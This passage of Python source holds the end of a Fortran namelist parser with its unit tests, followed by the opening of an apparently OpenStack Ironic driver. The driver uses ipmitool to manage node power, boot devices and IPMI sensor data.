        # Assign once, after parsing (the original re-assigned this inside
        # the innermost loop on every iteration).
        self.data = mynmlfile

    # Accessor and mutator, dictionary style
    def __getitem__(self, key):
        """ Return the parameter dictionary for namelist `key`."""
        return self.data[key]

    def __setitem__(self, key, value):
        """ Set the parameter dictionary for namelist `key`."""
        self.data[key] = value

    # ==== Helper functions for parsing of files
    @staticmethod
    def clean(mystringlist, commentexpr=r"^[\s\t]*\#.*$", spacemerge=0,
              cleancomma=0):
        """
        Remove leading and trailing blanks, comments/empty lines from a
        list of strings.

            commentexpr: regex defining a comment line
            spacemerge : if non-zero, merge/collapse multiple spaces
            cleancomma : remove leading and trailing commas
        """
        aa = mystringlist
        if cleancomma:
            aa = [re.sub(r"(^([\s\t]*\,)+)|((\,[\s\t]*)+$)", "", item).strip()
                  for item in aa]
        if commentexpr:
            aa = [re.sub(commentexpr, "", item).strip() for item in aa]
        # Python 3 compatibility: '<>' replaced by '!='.
        if spacemerge:
            aa = [re.sub(r"[\s\t]+", " ", item).strip()
                  for item in aa if len(item.strip()) != 0]
        else:
            aa = [item.strip() for item in aa if len(item.strip()) != 0]
        return aa

    @staticmethod
    def splitstring(mystr):
        """
        Split a string into a list of strings at quote boundaries.
            Input: string
            Output: list of strings
        """
        dquote = r'(^[^\"\']*)(\"[^"]*\")(.*)$'
        squote = r"(^[^\"\']*)(\'[^']*\')(.*$)"
        mystrarr = re.sub(dquote, r"\1\n\2\n\3",
                          re.sub(squote, r"\1\n\2\n\3", mystr)).split("\n")
        # Remove zero-length items (py3 compatible: '!=' instead of '<>').
        mystrarr = [item for item in mystrarr if len(item) != 0]
        if len(mystrarr) > 1:
            # Recurse until no further quote boundary splits occur.
            mystrarr2 = []
            for item in mystrarr:
                mystrarr2.extend(FortranNamelistIO.splitstring(item))
            mystrarr = mystrarr2
        return mystrarr

## Do Some testing -------------------------------------------------------
class TestFortranNamelist(TestWEFileIO):
    """ Test class for MyFileType class """

    test_file = './test/fortran/fortran_namelist.nml'

    def test_output_identical(self):
        """Reading a namelist and writing it back must reproduce it."""
        input_file = FortranNamelistIO(self.test_file)
        out_path = tempfile.mkstemp()[1]
        input_file.write(out_path)

        with open(self.test_file, 'r') as src:
            expected = src.read()

        with open(out_path, 'r') as dst:
            produced = dst.read()
        try:
            self.assertMultiLineEqual(produced, expected)
        finally:
            # Always clean up the temporary output file.
            os.remove(out_path)

    def test_duplication(self):
        """Round-trip duplication check provided by the base class."""
        self._test_duplication(FortranNamelistIO, self.test_file)


## Main function ---------------------------------------------------------
if __name__ == '__main__':
    # NOTE(review): the bare string below is an inert expression statement,
    # not a real docstring; kept byte-identical.
    """ This is the main fuction that will run the tests automatically
    """
    unittest.main()

# coding=utf-8

# Copyright 2012 Hewlett-Packard Development Company, L.P.
# Copyright (c) 2012 NTT DOCOMO, INC.
# Copyright 2014 International Business Machines Corporation
# All Rights Reserved.
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.

"""
IPMI power manager driver.

Uses the 'ipmitool' command (http://ipmitool.sourceforge.net/) to remotely
manage hardware.  This includes setting the boot device, getting a
serial-over-LAN console, and controlling the power state of the machine.

NOTE THAT CERTAIN DISTROS MAY INSTALL openipmi BY DEFAULT, INSTEAD OF ipmitool,
WHICH PROVIDES DIFFERENT COMMAND-LINE OPTIONS AND *IS NOT SUPPORTED* BY THIS
DRIVER.
"""

import contextlib
import os
import re
import subprocess
import tempfile
import time

from oslo_concurrency import processutils
from oslo_config import cfg
from oslo_log import log as logging
from oslo_service import loopingcall
from oslo_utils import excutils

from ironic.common import boot_devices
from ironic.common import exception
from ironic.common.i18n import _
from ironic.common.i18n import _LE
from ironic.common.i18n import _LI
from ironic.common.i18n import _LW
from ironic.common import states
from ironic.common import utils
from ironic.conductor import task_manager
from ironic.drivers import base
from ironic.drivers.modules import console_utils


CONF = cfg.CONF
# Reuse the retry options registered by the native IPMI driver so both
# drivers read the same [ipmi] configuration section.
CONF.import_opt('retry_timeout',
                'ironic.drivers.modules.ipminative',
                group='ipmi')
CONF.import_opt('min_command_interval',
                'ironic.drivers.modules.ipminative',
                group='ipmi')

LOG = logging.getLogger(__name__)

# Privilege levels accepted for the ipmi_priv_level driver_info field
# (validated in _parse_driver_info).
VALID_PRIV_LEVELS = ['ADMINISTRATOR', 'CALLBACK', 'OPERATOR', 'USER']

# Accepted ipmi_protocol_version values; '2.0' selects the 'lanplus'
# interface, '1.5' plain 'lan' (see _exec_ipmitool).
VALID_PROTO_VERSIONS = ('2.0', '1.5')

REQUIRED_PROPERTIES = {
    'ipmi_address': _("IP address or hostname of the node. Required.")
}
OPTIONAL_PROPERTIES = {
    'ipmi_password': _("password. Optional."),
    'ipmi_priv_level': _("privilege level; default is ADMINISTRATOR. One of "
                         "%s. Optional.") % ', '.join(VALID_PRIV_LEVELS),
    'ipmi_username': _("username; default is NULL user. Optional."),
    'ipmi_bridging': _("bridging_type; default is \"no\". One of \"single\", "
                       "\"dual\", \"no\". Optional."),
    'ipmi_transit_channel': _("transit channel for bridged request. Required "
                              "only if ipmi_bridging is set to \"dual\"."),
    'ipmi_transit_address': _("transit address for bridged request. Required "
                              "only if ipmi_bridging is set to \"dual\"."),
    'ipmi_target_channel': _("destination channel for bridged request. "
                             "Required only if ipmi_bridging is set to "
                             "\"single\" or \"dual\"."),
    'ipmi_target_address': _("destination address for bridged request. "
                             "Required only if ipmi_bridging is set "
                             "to \"single\" or \"dual\"."),
    'ipmi_local_address': _("local IPMB address for bridged requests. "
                            "Used only if ipmi_bridging is set "
                            "to \"single\" or \"dual\". Optional."),
    'ipmi_protocol_version': _('the version of the IPMI protocol; default '
                               'is "2.0". One of "1.5", "2.0". Optional.'),
}
COMMON_PROPERTIES = REQUIRED_PROPERTIES.copy()
COMMON_PROPERTIES.update(OPTIONAL_PROPERTIES)
CONSOLE_PROPERTIES = {
    'ipmi_terminal_port': _("node's UDP port to connect to. Only required for "
                            "console access.")
}
# (driver_info key, ipmitool command-line flag) pairs appended to the
# ipmitool invocation when bridging is configured (see _exec_ipmitool).
BRIDGING_OPTIONS = [('local_address', '-m'),
                    ('transit_channel', '-B'), ('transit_address', '-T'),
                    ('target_channel', '-b'), ('target_address', '-t')]

# Per-BMC timestamp of the last ipmitool invocation; used by
# _exec_ipmitool to rate-limit commands to one per min_command_interval.
LAST_CMD_TIME = {}
# Tri-state capability flags: None until probed, then True/False
# (see _check_option_support / _is_option_supported).
TIMING_SUPPORT = None
SINGLE_BRIDGE_SUPPORT = None
DUAL_BRIDGE_SUPPORT = None
TMP_DIR_CHECKED = None

# Harmless probe invocations ('-h') used only to detect whether the local
# ipmitool build supports timing and bridging options.
ipmitool_command_options = {
    'timing': ['ipmitool', '-N', '0', '-R', '0', '-h'],
    'single_bridge': ['ipmitool', '-m', '0', '-b', '0', '-t', '0', '-h'],
    'dual_bridge': ['ipmitool', '-m', '0', '-b', '0', '-t', '0',
                    '-B', '0', '-T', '0', '-h']}

# Note(TheJulia): This string is hardcoded in ipmitool's lanplus driver
# and is substituted in return for the error code received from the IPMI
# controller.  As of 1.8.15, no internationalization support appears to
# be in ipmitool which means the string should always be returned in this
# form regardless of locale.
IPMITOOL_RETRYABLE_FAILURES = ['insufficient resources for session']


def _check_option_support(options):
    """Checks if the specific ipmitool options are supported on host.

    This method updates the module-level variables indicating whether
    an option is supported so that it is accessible by any driver
    interface class in this module. It is intended to be called from
    the __init__ method of such classes only.

    :param options: list of ipmitool options to be checked
    :raises: OSError
    """
    for opt in options:
        if _is_option_supported(opt) is not None:
            # Already probed earlier in this process; skip.
            continue
        cmd = ipmitool_command_options[opt]
        try:
            # NOTE(cinerama): use subprocess.check_call to
            # check options & suppress ipmitool output to
            # avoid alarming people
            with open(os.devnull, 'wb') as nullfile:
                subprocess.check_call(cmd, stdout=nullfile,
                                      stderr=nullfile)
        except subprocess.CalledProcessError:
            LOG.info(_LI("Option %(opt)s is not supported by ipmitool"),
                     {'opt': opt})
            _is_option_supported(opt, False)
        else:
            LOG.info(_LI("Option %(opt)s is supported by ipmitool"),
                     {'opt': opt})
            _is_option_supported(opt, True)


def _is_option_supported(option, is_supported=None):
    """Indicates whether the particular ipmitool option is supported.

    :param option: specific ipmitool option
    :param is_supported: Optional Boolean. when specified, this value
                         is assigned to the module-level variable indicating
                         whether the option is supported. Used only if a value
                         is not already assigned.
    :returns: True, indicates the option is supported
    :returns: False, indicates the option is not supported
    :returns: None, indicates that it is not aware whether the option
              is supported
    """
    global SINGLE_BRIDGE_SUPPORT
    global DUAL_BRIDGE_SUPPORT
    global TIMING_SUPPORT

    # Each flag is write-once: only assign when still unprobed (None) and
    # a concrete value was supplied.
    if option == 'single_bridge':
        if SINGLE_BRIDGE_SUPPORT is None and is_supported is not None:
            SINGLE_BRIDGE_SUPPORT = is_supported
        return SINGLE_BRIDGE_SUPPORT
    if option == 'dual_bridge':
        if DUAL_BRIDGE_SUPPORT is None and is_supported is not None:
            DUAL_BRIDGE_SUPPORT = is_supported
        return DUAL_BRIDGE_SUPPORT
    if option == 'timing':
        if TIMING_SUPPORT is None and is_supported is not None:
            TIMING_SUPPORT = is_supported
        return TIMING_SUPPORT


def _console_pwfile_path(uuid):
    """Return the file path for storing the ipmi password for a console."""
    # "<uuid>.pw" inside the configured temp directory.
    return os.path.join(CONF.tempdir, "%s.pw" % uuid)


@contextlib.contextmanager
def _make_password_file(password):
    """Makes a temporary file that contains the password.

    :param password: the password
    :returns: the absolute pathname of the temporary file
    :raises: PasswordFileFailedToCreate from creating or writing to the
             temporary file
    """
    # Start with None so the cleanup code can tell whether the temporary
    # file was actually created before an error occurred.
    f = None
    try:
        # NamedTemporaryFile is removed from disk automatically on close.
        f = tempfile.NamedTemporaryFile(mode='w', dir=CONF.tempdir)
        f.write(str(password))
        f.flush()
    except (IOError, OSError) as exc:
        if f is not None:
            f.close()
        raise exception.PasswordFileFailedToCreate(error=exc)
    except Exception:
        # Any other error: close the file, then re-raise the original
        # exception unchanged.
        with excutils.save_and_reraise_exception():
            if f is not None:
                f.close()

    try:
        # NOTE(jlvillal): This yield can not be in the try/except block above
        # because an exception by the caller of this function would then get
        # changed to a PasswordFileFailedToCreate exception which would mislead
        # about the problem and its cause.
        yield f.name
    finally:
        if f is not None:
            f.close()


def _parse_driver_info(node):
    """Gets the parameters required for ipmitool to access the node.

    :param node: the Node of interest.
    :returns: dictionary of parameters.
    :raises: InvalidParameterValue when an invalid value is specified
    :raises: MissingParameterValue when a required ipmi parameter is missing.

    """
    info = node.driver_info or {}
    bridging_types = ['single', 'dual']
    # Fail fast if any required credential is absent or empty.
    missing_info = [key for key in REQUIRED_PROPERTIES if not info.get(key)]
    if missing_info:
        raise exception.MissingParameterValue(_(
            "Missing the following IPMI credentials in node's"
            " driver_info: %s.") % missing_info)

    address = info.get('ipmi_address')
    username = info.get('ipmi_username')
    password = info.get('ipmi_password')
    port = info.get('ipmi_terminal_port')
    priv_level = info.get('ipmi_priv_level', 'ADMINISTRATOR')
    bridging_type = info.get('ipmi_bridging', 'no')
    local_address = info.get('ipmi_local_address')
    transit_channel = info.get('ipmi_transit_channel')
    transit_address = info.get('ipmi_transit_address')
    target_channel = info.get('ipmi_target_channel')
    target_address = info.get('ipmi_target_address')
    # Normalized to a string so non-string config values (e.g. 2.0) still
    # compare against VALID_PROTO_VERSIONS.
    protocol_version = str(info.get('ipmi_protocol_version', '2.0'))

    if protocol_version not in VALID_PROTO_VERSIONS:
        valid_versions = ', '.join(VALID_PROTO_VERSIONS)
        raise exception.InvalidParameterValue(_(
            "Invalid IPMI protocol version value %(version)s, the valid "
            "value can be one of %(valid_versions)s") %
            {'version': protocol_version, 'valid_versions': valid_versions})

    if port:
        try:
            port = int(port)
        except ValueError:
            raise exception.InvalidParameterValue(_(
                "IPMI terminal port is not an integer."))

    # check if ipmi_bridging has proper value
    if bridging_type == 'no':
        # if bridging is not selected, then set all bridging params to None
        (local_address, transit_channel, transit_address, target_channel,
         target_address) = (None,) * 5
    elif bridging_type in bridging_types:
        # check if the particular bridging option is supported on host
        if not _is_option_supported('%s_bridge' % bridging_type):
            raise exception.InvalidParameterValue(_(
                "Value for ipmi_bridging is provided as %s, but IPMI "
                "bridging is not supported by the IPMI utility installed "
                "on host. Ensure ipmitool version is > 1.8.11"
            ) % bridging_type)

        # ensure that all the required parameters are provided
        # (target channel/address are needed for both bridging modes)
        params_undefined = [param for param, value in [
            ("ipmi_target_channel", target_channel),
            ('ipmi_target_address', target_address)] if value is None]
        if bridging_type == 'dual':
            # dual bridging additionally requires the transit parameters
            params_undefined2 = [param for param, value in [
                ("ipmi_transit_channel", transit_channel),
                ('ipmi_transit_address', transit_address)
            ] if value is None]
            params_undefined.extend(params_undefined2)
        else:
            # if single bridging was selected, set dual bridge params to None
            transit_channel = transit_address = None

        # If the required parameters were not provided,
        # raise an exception
        if params_undefined:
            raise exception.MissingParameterValue(_(
                "%(param)s not provided") % {'param': params_undefined})
    else:
        raise exception.InvalidParameterValue(_(
            "Invalid value for ipmi_bridging: %(bridging_type)s,"
            " the valid value can be one of: %(bridging_types)s"
        ) % {'bridging_type': bridging_type,
             'bridging_types': bridging_types + ['no']})

    if priv_level not in VALID_PRIV_LEVELS:
        valid_priv_lvls = ', '.join(VALID_PRIV_LEVELS)
        raise exception.InvalidParameterValue(_(
            "Invalid privilege level value:%(priv_level)s, the valid value"
            " can be one of %(valid_levels)s") %
            {'priv_level': priv_level, 'valid_levels': valid_priv_lvls})

    return {
        'address': address,
        'username': username,
        'password': password,
        'port': port,
        'uuid': node.uuid,
        'priv_level': priv_level,
        'local_address': local_address,
        'transit_channel': transit_channel,
        'transit_address': transit_address,
        'target_channel': target_channel,
        'target_address': target_address,
        'protocol_version': protocol_version,
    }


def _exec_ipmitool(driver_info, command):
    """Execute the ipmitool command.

    :param driver_info: the ipmitool parameters for accessing a node.
    :param command: the ipmitool command to be executed.
    :returns: (stdout, stderr) from executing the command.
    :raises: PasswordFileFailedToCreate from creating or writing to the
             temporary file.
    :raises: processutils.ProcessExecutionError from executing the command.

    """
    # IPMI v2.0 uses the 'lanplus' interface; v1.5 uses plain 'lan'.
    ipmi_version = ('lanplus'
                    if driver_info['protocol_version'] == '2.0'
                    else 'lan')
    args = ['ipmitool',
            '-I',
            ipmi_version,
            '-H',
            driver_info['address'],
            '-L', driver_info['priv_level']
            ]
    if driver_info['username']:
        args.append('-U')
        args.append(driver_info['username'])

    # Append any bridging flags configured for this node.
    for name, option in BRIDGING_OPTIONS:
        if driver_info[name] is not None:
            args.append(option)
            args.append(driver_info[name])

    # specify retry timing more precisely, if supported
    num_tries = max(
        (CONF.ipmi.retry_timeout // CONF.ipmi.min_command_interval), 1)

    if _is_option_supported('timing'):
        args.append('-R')
        args.append(str(num_tries))

        args.append('-N')
        args.append(str(CONF.ipmi.min_command_interval))

    end_time = (time.time() + CONF.ipmi.retry_timeout)

    while True:
        num_tries = num_tries - 1
        # NOTE(deva): ensure that no communications are sent to a BMC more
        #             often than once every min_command_interval seconds.
        time_till_next_poll = CONF.ipmi.min_command_interval - (
            time.time() - LAST_CMD_TIME.get(driver_info['address'], 0))
        if time_till_next_poll > 0:
            time.sleep(time_till_next_poll)
        # Copy the base argument list on every iteration so the '-f'
        # password-file arguments appended below are NOT carried over
        # from a previous attempt. (The original comment said "preserved",
        # which inverted the intent.)
        cmd_args = args[:]
        # 'ipmitool' command will prompt password if there is no '-f'
        # option, we set it to '\0' to write a password file to support
        # empty password
        with _make_password_file(driver_info['password'] or '\0') as pw_file:
            cmd_args.append('-f')
            cmd_args.append(pw_file)
            cmd_args.extend(command.split(" "))
            try:
                out, err = utils.execute(*cmd_args)
                return out, err
            except processutils.ProcessExecutionError as e:
                with excutils.save_and_reraise_exception() as ctxt:
                    # Retry only on known-transient ipmitool failures, and
                    # only while the time/attempt budget remains.
                    err_list = [x for x in IPMITOOL_RETRYABLE_FAILURES
                                if x in e.args[0]]
                    if ((time.time() > end_time) or
                        (num_tries == 0) or
                        not err_list):
                        LOG.error(_LE('IPMI Error while attempting "%(cmd)s"'
                                      'for node %(node)s. Error: %(error)s'), {
                                  'node': driver_info['uuid'],
                                  'cmd': e.cmd, 'error': e
                                  })
                    else:
                        # Transient failure with budget left: suppress the
                        # re-raise and loop again.
                        ctxt.reraise = False
                        LOG.warning(_LW('IPMI Error encountered, retrying '
                                        '"%(cmd)s" for node %(node)s. '
                                        'Error: %(error)s'), {
                                    'node': driver_info['uuid'],
                                    'cmd': e.cmd, 'error': e
                                    })
            finally:
                LAST_CMD_TIME[driver_info['address']] = time.time()


def _sleep_time(iter):
    """Return the time-to-sleep for the n'th iteration of a retry loop.

    This implementation increases exponentially.

    :param iter: iteration number
    :returns: number of seconds to sleep

    """
    if iter <= 1:
        return 1
    return iter ** 2


def _set_and_wait(target_state, driver_info):
    """Helper function for DynamicLoopingCall.

    This method changes the power state and polls the BMC until the desired
    power state is reached, or CONF.ipmi.retry_timeout would be exceeded by the
    next iteration.

    This method assumes the caller knows the current power state and does not
    check it prior to changing the power state. Most BMCs should be fine, but
    if a driver is concerned, the state should be checked prior to calling this
    method.

    :param target_state: desired power state
    :param driver_info: the ipmitool parameters for accessing a node.
    :returns: one of ironic.common.states

    """
    # NOTE(review): state_name is only assigned for POWER_ON/POWER_OFF; any
    # other target_state would raise NameError below. The callers here
    # (_power_on/_power_off) only pass those two states — confirm before
    # adding new callers.
    if target_state == states.POWER_ON:
        state_name = "on"
    elif target_state == states.POWER_OFF:
        state_name = "off"

    def _wait(mutable):
        # One polling step; returns the next sleep interval or raises
        # LoopingCallDone to stop the DynamicLoopingCall.
        try:
            # Only issue power change command once
            if mutable['iter'] < 0:
                _exec_ipmitool(driver_info, "power %s" % state_name)
            else:
                mutable['power'] = _power_status(driver_info)
        except (exception.PasswordFileFailedToCreate,
                processutils.ProcessExecutionError,
                exception.IPMIFailure):
            # Log failures but keep trying
            LOG.warning(_LW("IPMI power %(state)s failed for node %(node)s."),
                        {'state': state_name, 'node': driver_info['uuid']})
        finally:
            mutable['iter'] += 1

        if mutable['power'] == target_state:
            raise loopingcall.LoopingCallDone()

        sleep_time = _sleep_time(mutable['iter'])
        if (sleep_time + mutable['total_time']) > CONF.ipmi.retry_timeout:
            # Stop if the next loop would exceed maximum retry_timeout
            LOG.error(_LE('IPMI power %(state)s timed out after '
                          '%(tries)s retries on node %(node_id)s.'),
                      {'state': state_name, 'tries': mutable['iter'],
                       'node_id': driver_info['uuid']})
            mutable['power'] = states.ERROR
            raise loopingcall.LoopingCallDone()
        else:
            mutable['total_time'] += sleep_time
            return sleep_time

    # Use mutable objects so the looped method can change them.
    # Start 'iter' from -1 so that the first two checks are one second apart.
    status = {'power': None, 'iter': -1, 'total_time': 0}

    timer = loopingcall.DynamicLoopingCall(_wait, status)
    timer.start().wait()
    return status['power']


def _power_on(driver_info):
    """Turn the power ON for this node.

    Blocks until the node reports POWER_ON or the retry timeout elapses
    (in which case ERROR is returned by _set_and_wait).

    :param driver_info: the ipmitool parameters for accessing a node.
    :returns: one of ironic.common.states POWER_ON or ERROR.
    :raises: IPMIFailure on an error from ipmitool (from _power_status call).

    """
    return _set_and_wait(states.POWER_ON, driver_info)


def _power_off(driver_info):
    """Turn the power OFF for this node.

    Blocks until the node reports POWER_OFF or the retry timeout elapses
    (in which case ERROR is returned by _set_and_wait).

    :param driver_info: the ipmitool parameters for accessing a node.
    :returns: one of ironic.common.states POWER_OFF or ERROR.
    :raises: IPMIFailure on an error from ipmitool (from _power_status call).

    """
    return _set_and_wait(states.POWER_OFF, driver_info)


def _power_status(driver_info):
    """Get the power status for a node.

    :param driver_info: the ipmitool access parameters for a node.
    :returns: one of ironic.common.states POWER_OFF, POWER_ON or ERROR.
    :raises: IPMIFailure on an error from ipmitool.

    """
    cmd = "power status"
    try:
        stdout = _exec_ipmitool(driver_info, cmd)[0]
    except (exception.PasswordFileFailedToCreate,
            processutils.ProcessExecutionError) as e:
        LOG.warning(_LW("IPMI power status failed for node %(node_id)s with "
                        "error: %(error)s."),
                    {'node_id': driver_info['uuid'], 'error': e})
        raise exception.IPMIFailure(cmd=cmd)

    # Map ipmitool's exact stdout to a power state; any other output
    # is treated as ERROR.
    status_by_output = {
        "Chassis Power is on\n": states.POWER_ON,
        "Chassis Power is off\n": states.POWER_OFF,
    }
    return status_by_output.get(stdout, states.ERROR)


def _process_sensor(sensor_data):
    sensor_data_fields = sensor_data.split('\n')
    sensor_data_dict = {}
    for field in sensor_data_fields:
        if not field:
            continue
        kv_value = field.split(':')
        if len(kv_value) != 2:
            continue
        sensor_data_dict[kv_value[0].strip()] = kv_value[1].strip()

    return sensor_data_dict


def _get_sensor_type(node, sensor_data_dict):
    # Have only three sensor type name IDs: 'Sensor Type (Analog)'
    # 'Sensor Type (Discrete)' and 'Sensor Type (Threshold)'

    for key in ('Sensor Type (Analog)', 'Sensor Type (Discrete)',
                'Sensor Type (Threshold)'):
        try:
            return sensor_data_dict[key].split(' ', 1)[0]
        except KeyError:
            continue

    raise exception.FailedToParseSensorData(
        node=node.uuid,
        error=(_("parse ipmi sensor data failed, unknown sensor type"
                 " data: %(sensors_data)s"),
               {'sensors_data': sensor_data_dict}))


def _parse_ipmi_sensors_data(node, sensors_data):
    """Parse the IPMI sensors data and format to the dict grouping by type.

    We run 'ipmitool' command with 'sdr -v' options, which can return sensor
    details in human-readable format, we need to format them to JSON string
    dict-based data for Ceilometer Collector which can be sent it as payload
    out via notification bus and consumed by Ceilometer Collector.

    :param sensors_data: the sensor data returned by ipmitool command.
    :returns: the sensor data with JSON format, grouped by sensor type.
    :raises: FailedToParseSensorData when error encountered during parsing.

    """
    grouped = {}
    if not sensors_data:
        return grouped

    # Sensor blocks are separated by blank lines in 'sdr -v' output.
    for block in sensors_data.split('\n\n'):
        fields = _process_sensor(block)
        if not fields:
            continue

        sensor_type = _get_sensor_type(node, fields)

        # Ignore the sensors which have no current 'Sensor Reading' data.
        if 'Sensor Reading' in fields:
            grouped.setdefault(sensor_type, {})[fields['Sensor ID']] = fields

    # Got nothing: no valid sensor data at all.
    if not grouped:
        raise exception.FailedToParseSensorData(
            node=node.uuid,
            error=(_("parse ipmi sensor data failed, get nothing with input"
                     " data: %(sensors_data)s")
                   % {'sensors_data': sensors_data}))
    return grouped


@task_manager.require_exclusive_lock
def send_raw(task, raw_bytes):
    """Send raw bytes to the BMC. Bytes should be a string of bytes.

    :param task: a TaskManager instance.
    :param raw_bytes: a string of raw bytes to send, e.g. '0x00 0x01'
    :raises: IPMIFailure on an error from ipmitool.
    :raises: MissingParameterValue if a required parameter is missing.
    :raises: InvalidParameterValue when an invalid value is specified.

    """
    node_uuid = task.node.uuid
    LOG.debug('Sending node %(node)s raw bytes %(bytes)s',
              {'bytes': raw_bytes, 'node': node_uuid})
    cmd = 'raw %s' % raw_bytes
    driver_info = _parse_driver_info(task.node)

    try:
        out, err = _exec_ipmitool(driver_info, cmd)
    except (exception.PasswordFileFailedToCreate,
            processutils.ProcessExecutionError) as e:
        LOG.exception(_LE('IPMI "raw bytes" failed for node %(node_id)s '
                      'with error: %(error)s.'),
                      {'node_id': node_uuid, 'error': e})
        raise exception.IPMIFailure(cmd=cmd)

    LOG.debug('send raw bytes returned stdout: %(stdout)s, stderr:'
              ' %(stderr)s', {'stdout': out, 'stderr': err})


def _check_temp_dir():
    """Ensure the temp directory used for ipmitool password files is usable.

    Caches the result in the module-level TMP_DIR_CHECKED flag so the
    filesystem is only probed once per process; re-raises the error from
    utils.check_dir() with an ipmitool-specific message on failure.
    """
    global TMP_DIR_CHECKED
    # because a temporary file is used to pass the password to ipmitool,
    # we should check the directory
    if TMP_DIR_CHECKED is None:
        try:
            utils.check_dir()
        except (exception.PathNotFound,
                exception.DirectoryNotWritable,
                exception.InsufficientDiskSpace) as e:
            with excutils.save_and_reraise_exception():
                # Remember the failure so subsequent calls re-probe is skipped,
                # then rewrite the message so the re-raised error carries the
                # ipmitool context.
                TMP_DIR_CHECKED = False
                err_msg = (_("Ipmitool drivers need to be able to create "
                             "temporary files to pass password to ipmitool. "
                             "Encountered error: %s") % e)
                e.message = err_msg
                LOG.error(err_msg)
        else:
            TMP_DIR_CHECKED = True


class IPMIPower(base.PowerInterface):
    """Power interface backed by the ipmitool command-line utility."""

    def __init__(self):
        required_options = ['timing', 'single_bridge', 'dual_bridge']
        try:
            _check_option_support(required_options)
        except OSError:
            raise exception.DriverLoadError(
                driver=self.__class__.__name__,
                reason=_("Unable to locate usable ipmitool command in "
                         "the system path when checking ipmitool version"))
        _check_temp_dir()

    def get_properties(self):
        return COMMON_PROPERTIES

    def validate(self, task):
        """Validate driver_info for ipmitool driver.

        Check that node['driver_info'] contains IPMI credentials.

        :param task: a TaskManager instance containing the node to act on.
        :raises: InvalidParameterValue if required ipmi parameters are missing.
        :raises: MissingParameterValue if a required parameter is missing.

        """
        _parse_driver_info(task.node)
        # NOTE(deva): don't actually touch the BMC in validate because it is
        #             called too often, and BMCs are too fragile.
        #             This is a temporary measure to mitigate problems while
        #             1314954 and 1314961 are resolved.

    def get_power_state(self, task):
        """Get the current power state of the task's node.

        :param task: a TaskManager instance containing the node to act on.
        :returns: one of ironic.common.states POWER_OFF, POWER_ON or ERROR.
        :raises: InvalidParameterValue if required ipmi parameters are missing.
        :raises: MissingParameterValue if a required parameter is missing.
        :raises: IPMIFailure on an error from ipmitool (from _power_status
            call).

        """
        return _power_status(_parse_driver_info(task.node))

    @task_manager.require_exclusive_lock
    def set_power_state(self, task, pstate):
        """Turn the power on or off.

        :param task: a TaskManager instance containing the node to act on.
        :param pstate: The desired power state, one of ironic.common.states
            POWER_ON, POWER_OFF.
        :raises: InvalidParameterValue if an invalid power state was specified.
        :raises: MissingParameterValue if required ipmi parameters are missing
        :raises: PowerStateFailure if the power couldn't be set to pstate.

        """
        info = _parse_driver_info(task.node)

        # Dispatch on the requested state; anything else is invalid input.
        handlers = {states.POWER_ON: _power_on,
                    states.POWER_OFF: _power_off}
        try:
            handler = handlers[pstate]
        except KeyError:
            raise exception.InvalidParameterValue(
                _("set_power_state called "
                  "with invalid power state %s.") % pstate)

        if handler(info) != pstate:
            raise exception.PowerStateFailure(pstate=pstate)

    @task_manager.require_exclusive_lock
    def reboot(self, task):
        """Cycles the power to the task's node.

        :param task: a TaskManager instance containing the node to act on.
        :raises: MissingParameterValue if required ipmi parameters are missing.
        :raises: InvalidParameterValue if an invalid power state was specified.
        :raises: PowerStateFailure if the final state of the node is not
            POWER_ON.

        """
        info = _parse_driver_info(task.node)
        _power_off(info)
        if _power_on(info) != states.POWER_ON:
            raise exception.PowerStateFailure(pstate=states.POWER_ON)


class IPMIManagement(base.ManagementInterface):
    """Management interface (boot device, sensor data) backed by ipmitool."""

    def get_properties(self):
        return COMMON_PROPERTIES

    def __init__(self):
        try:
            _check_option_support(['timing', 'single_bridge', 'dual_bridge'])
        except OSError:
            raise exception.DriverLoadError(
                driver=self.__class__.__name__,
                reason=_("Unable to locate usable ipmitool command in "
                         "the system path when checking ipmitool version"))
        _check_temp_dir()

    def validate(self, task):
        """Check that 'driver_info' contains IPMI credentials.

        Validates whether the 'driver_info' property of the supplied
        task's node contains the required credentials information.

        :param task: a task from TaskManager.
        :raises: InvalidParameterValue if required IPMI parameters
            are missing.
        :raises: MissingParameterValue if a required parameter is missing.

        """
        _parse_driver_info(task.node)

    def get_supported_boot_devices(self, task):
        """Get a list of the supported boot devices.

        :param task: a task from TaskManager.
        :returns: A list with the supported boot devices defined
                  in :mod:`ironic.common.boot_devices`.

        """
        return [boot_devices.PXE, boot_devices.DISK, boot_devices.CDROM,
                boot_devices.BIOS, boot_devices.SAFE]

    @task_manager.require_exclusive_lock
    def set_boot_device(self, task, device, persistent=False):
        """Set the boot device for the task's node.

        Set the boot device to use on next reboot of the node.

        :param task: a task from TaskManager.
        :param device: the boot device, one of
                       :mod:`ironic.common.boot_devices`.
        :param persistent: Boolean value. True if the boot device will
                           persist to all future boots, False if not.
                           Default: False.
        :raises: InvalidParameterValue if an invalid boot device is specified
        :raises: MissingParameterValue if required ipmi parameters are missing.
        :raises: IPMIFailure on an error from ipmitool.

        """
        if device not in self.get_supported_boot_devices(task):
            raise exception.InvalidParameterValue(_(
                "Invalid boot device %s specified.") % device)

        # note(JayF): IPMI spec indicates unless you send these raw bytes the
        # boot device setting times out after 60s. Since it's possible it
        # could be >60s before a node is rebooted, we should always send them.
        # This mimics pyghmi's current behavior, and the "option=timeout"
        # setting on newer ipmitool binaries.
        timeout_disable = "0x00 0x08 0x03 0x08"
        send_raw(task, timeout_disable)

        cmd = "chassis bootdev %s" % device
        if persistent:
            cmd = cmd + " options=persistent"
        driver_info = _parse_driver_info(task.node)
        try:
            out, err = _exec_ipmitool(driver_info, cmd)
        except (exception.PasswordFileFailedToCreate,
                processutils.ProcessExecutionError) as e:
            LOG.warning(_LW('IPMI set boot device failed for node %(node)s '
                            'when executing "ipmitool %(cmd)s". '
                            'Error: %(error)s'),
                        {'node': driver_info['uuid'], 'cmd': cmd, 'error': e})
            raise exception.IPMIFailure(cmd=cmd)

    def get_boot_device(self, task):
        """Get the current boot device for the task's node.

        Returns the current boot device of the node.

        :param task: a task from TaskManager.
        :raises: InvalidParameterValue if required IPMI parameters
            are missing.
        :raises: IPMIFailure on an error from ipmitool.
        :raises: MissingParameterValue if a required parameter is missing.
